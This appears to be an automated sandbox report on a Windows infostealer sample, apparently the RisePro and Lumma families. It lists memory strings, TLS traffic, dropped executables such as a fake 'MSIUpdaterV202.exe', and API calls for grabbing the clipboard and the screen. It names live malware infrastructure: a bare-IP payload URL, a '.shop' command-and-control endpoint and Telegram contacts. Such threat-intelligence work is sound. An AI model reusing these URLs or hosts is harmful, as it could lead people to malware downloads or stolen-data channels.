Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000002.2259208520.0000000006162000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.65.116/lumma2305.exe
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.65.116/lumma2305.exeEWPz
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.65.116/lumma2305.exeMeleonCH
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.65.116/lumma2305.exeaTTm
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.65.116/lumma2305.exej
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.65.116/lumma2305.exeto.de
Source: tMO4FVIc9l.exe, 00000000.00000002.2259208520.0000000006162000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.65.116/lumma2305.exe~
Source: Amcache.hve.15.dr	String found in binary or memory: http://upx.sf.net
Source: tMO4FVIc9l.exe, 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.175
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com:443/demo/home.php?s=8.46.123.175
Source: tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2352713016.0000000001346000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2244993517.000000000118F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.2456519007.00000000014F3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.2498499806.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.2498499806.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://employhabragaomlsp.shop/
Source: RegAsm.exe, 00000019.00000002.2498499806.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://employhabragaomlsp.shop/8
Source: RegAsm.exe, 00000019.00000002.2498499806.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://employhabragaomlsp.shop/aibcnf
Source: RegAsm.exe, 00000008.00000002.2350449893.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2353071644.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2352713016.000000000135E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.2456254141.00000000014D3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.2456519007.0000000001505000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.2456254141.000000000147C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.2499274804.000000000309D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.2498499806.0000000000C36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://employhabragaomlsp.shop/api
Source: RegAsm.exe, 00000019.00000002.2499274804.000000000309D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://employhabragaomlsp.shop/api(
Source: RegAsm.exe, 0000000C.00000002.2244993517.000000000114A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://employhabragaomlsp.shop/apiO
Source: RegAsm.exe, 00000015.00000002.2456519007.0000000001505000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://employhabragaomlsp.shop/apiP
Source: RegAsm.exe, 00000015.00000002.2456254141.000000000147C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://employhabragaomlsp.shop/apiY
Source: RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://employhabragaomlsp.shop/apih
Source: RegAsm.exe, 00000019.00000002.2498499806.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://employhabragaomlsp.shop/i
Source: RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://employhabragaomlsp.shop/l
Source: RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://employhabragaomlsp.shop/pi
Source: RegAsm.exe, 00000015.00000002.2456254141.00000000014D3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.2498499806.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://employhabragaomlsp.shop/s
Source: RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://employhabragaomlsp.shop:443/api
Source: RegAsm.exe, 0000000C.00000002.2244993517.000000000118F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://employhabragaomlsp.shop:443/apihrome
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/Y
Source: tMO4FVIc9l.exe, 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014AB000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.175
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.175F
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://support.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.000000000146E000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000002.2259208520.000000000611B000.00000004.00000020.00020000.00000000.sdmp, KBHGMwjOItm_DLNJJFRnML7.zip.0.dr	String found in binary or memory: https://t.me/RiseProSUPPORT
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2154211616.00000000061A6000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.0.dr	String found in binary or memory: https://t.me/risepro_bot
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_botD
Source: tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org#
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49757 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_0042D5A0 GetWindowLongW,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

12_2_0042D5A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_0042D5A0 GetWindowLongW,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

12_2_0042D5A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_0042D760 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

12_2_0042D760

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_00878BB0	0_2_00878BB0
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_0091AD00	0_2_0091AD00
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_008BF0D0	0_2_008BF0D0
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_0095F550	0_2_0095F550
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_0082B8E0	0_2_0082B8E0
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_008A1C10	0_2_008A1C10
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_00965DE0	0_2_00965DE0
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_008C4320	0_2_008C4320
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_0086036F	0_2_0086036F
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_008A45E0	0_2_008A45E0
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_009686C0	0_2_009686C0
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_008747BF	0_2_008747BF
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_0085A928	0_2_0085A928
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_0085C960	0_2_0085C960
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_0090EC40	0_2_0090EC40
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_00A52D3B	0_2_00A52D3B
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_00966D20	0_2_00966D20
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_00954D40	0_2_00954D40
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_00878E30	0_2_00878E30
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_008571A0	0_2_008571A0
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_0084F580	0_2_0084F580
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_008C3610	0_2_008C3610
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_00967760	0_2_00967760
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_00961F00	0_2_00961F00
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: 7_2_004F68B8	7_2_004F68B8
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: 7_2_004F3320	7_2_004F3320
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: 9_2_00C068B8	9_2_00C068B8
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: 9_2_00C03320	9_2_00C03320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00437445	12_2_00437445
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00426450	12_2_00426450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00401000	12_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00406170	12_2_00406170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004201F0	12_2_004201F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00403180	12_2_00403180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004322A0	12_2_004322A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042434B	12_2_0042434B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00420330	12_2_00420330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00419464	12_2_00419464
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041648C	12_2_0041648C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040F500	12_2_0040F500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00404650	12_2_00404650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00423630	12_2_00423630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004016C0	12_2_004016C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041F6E0	12_2_0041F6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004087D0	12_2_004087D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041B7BE	12_2_0041B7BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00407970	12_2_00407970
